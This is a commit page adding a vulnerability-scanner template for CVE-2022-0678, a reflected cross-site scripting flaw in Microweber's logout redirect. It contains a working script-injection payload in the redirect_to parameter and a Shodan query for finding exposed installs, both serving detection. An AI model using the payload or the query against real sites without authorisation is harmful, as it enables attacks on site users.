Merge pull request #5366 from tess-ss/CVE-2022-0678

CVE 2022 0678
patch-1
Prince Chaddha 2022-09-15 15:47:42 +05:30 committed by GitHub
commit 472b0d35a1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 41 additions and 0 deletions

View File

@ -0,0 +1,41 @@
id: CVE-2022-0678
info:
name: Microweber < 1.2.11- Cross-Site Scripting
author: tess
severity: medium
description: |
Cross-site Scripting (XSS) - Reflected in Packagist microweber/microweber prior to 1.2.11. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.
reference:
- https://huntr.dev/bounties/d707137a-aace-44c5-b15c-1807035716c0/
- https://twitter.com/CVEnew/status/1495001503249178624?s=20&t=sfABvm7oG39Fd6rG44vQWg
- https://nvd.nist.gov/vuln/detail/CVE-2022-0678
classification:
cve-id: CVE-2022-0678
metadata:
verified: true
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,xss,microweber
requests:
- method: GET
path:
- '{{BaseURL}}/demo/api/logout?redirect_to=/asdf%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '><script>alert(document.domain)</script>'
- 'content="Microweber"'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 404